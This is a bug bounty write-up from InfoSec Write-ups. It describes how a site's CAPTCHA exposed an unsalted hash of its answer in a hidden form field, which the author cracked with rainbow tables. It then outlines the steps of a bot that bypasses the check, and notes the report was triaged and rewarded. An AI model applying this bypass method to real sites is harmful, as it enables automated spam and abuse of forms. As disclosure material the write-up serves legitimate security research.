Bypassing Captcha Like a Boss

Ak1T4
Ak1T4
Apr 16, 2018 · 3 min read

Hello Hunters! It’s been a while since my last write up, so i decide to share a fun experience that i had while hunting on a private program.

What the hell is a captcha?

From my point of view: A captcha solution is mostly utilized for avoid bots and ensure that the User behind the app is a real human.

Share is care, so let’s go to the write up!

Mapping the Application, i found a subscription endpoint with a captcha filter like this:

http://example.com/captcha/captchaCheck?

Image for post

This took my attention quickly so i move to the src page:

<form action=”/captcha/captchaCheck” method=”post”>
<input name=”hashvalue=”09573e52f752f3f5e6250b62aa34b8a8c08a4d22" type=”hidden”>
<input name=”emailAddress” value=”test@email.com” type=”hidden”>
<input name=”name” value=”” type=”hidden”>
<input name=”enteredValue” size=”25" type=”text”>
<input value=”Subscribe” type=”submit”>
</form>

If you look at the form you can realize that there are 2 interesting params:

hash” (encryption hash) and ”enteredValue” (number value of the captcha)

So, i fill the captcha and sent the form:

At this point i needed to realize the behavior/functionality of this captcha, so:

I found this:

If “hash” == “enteredValue” then Request is Accepted

If “hash” != “enteredValue” then Request is Blocked

Nice, so.. its quite simple: if params match: requests is accepted.. Now the complex thing is: that hash can be decrypted? : Challenge Accepted!

Image for post

So i paste the hash in my terminal and try to decrypt with “dcipher”:

(Decipher hashes using online rainbow tables [hash toolkit, GromWeb, MD5Hashing] & lookup table attack services.)

Image for post

Nice! Decrypted: OK! If you notice the 6 digits number is equal to the captcha image below:

Image for post

Well well well, now we have all the pieces in the table: so.. let’s create a bot!

Image for post

I created a bot in python for PoC purposes to show how an attacker can easily bypass this captcha behavior and abuse of his functionality:

1) First the bot sent a request to the subscription page with the captcha -> https://company.com/captcha/form/?
2) Bot scrape on the page and retrieve the ‘hash’ value param.
3) Bot decrypt the Hash (dcipher)
4) With decrypted value the bot creates a POST request to http://company.com//captcha/captchaCheck and automatically fills all user form required params with random values (email, name, ipaddress, etc)
5) Bot sent the POST request and bypass the captcha

The bot is very basic but works like a charm.. so i sent this PoC to the program with the next explanation:

Security Impact

An attacker can create a bot to bypass the captcha and automate the tasks to sent unlimited requests to a multiple urls or lists with random/fake users, emails, IP address.. for spamming or evil purposes (collect data, analyze traffic behaviors, etc)

( The program had a really fast response! < 1h )

TIMELINE

Submitted 2018–04–16 03:51:17 UTC

Team Response with triage and bounty 2018–04–16 04:48:17 UTC

(Bounty $ xxx)

So ak1t4 is happy!

Image for post

I hope you enjoyed this reading as i enjoyed writing it!

And remember: if you fail? try harder!

Happy Hunting!

InfoSec Write-ups

A collection of write-ups from the best hackers in the…

Ak1T4

Written by

Ak1T4

WhiteHat Hacker Zen Monk & Bounty Hunter

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Ak1T4

Written by

Ak1T4

WhiteHat Hacker Zen Monk & Bounty Hunter

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store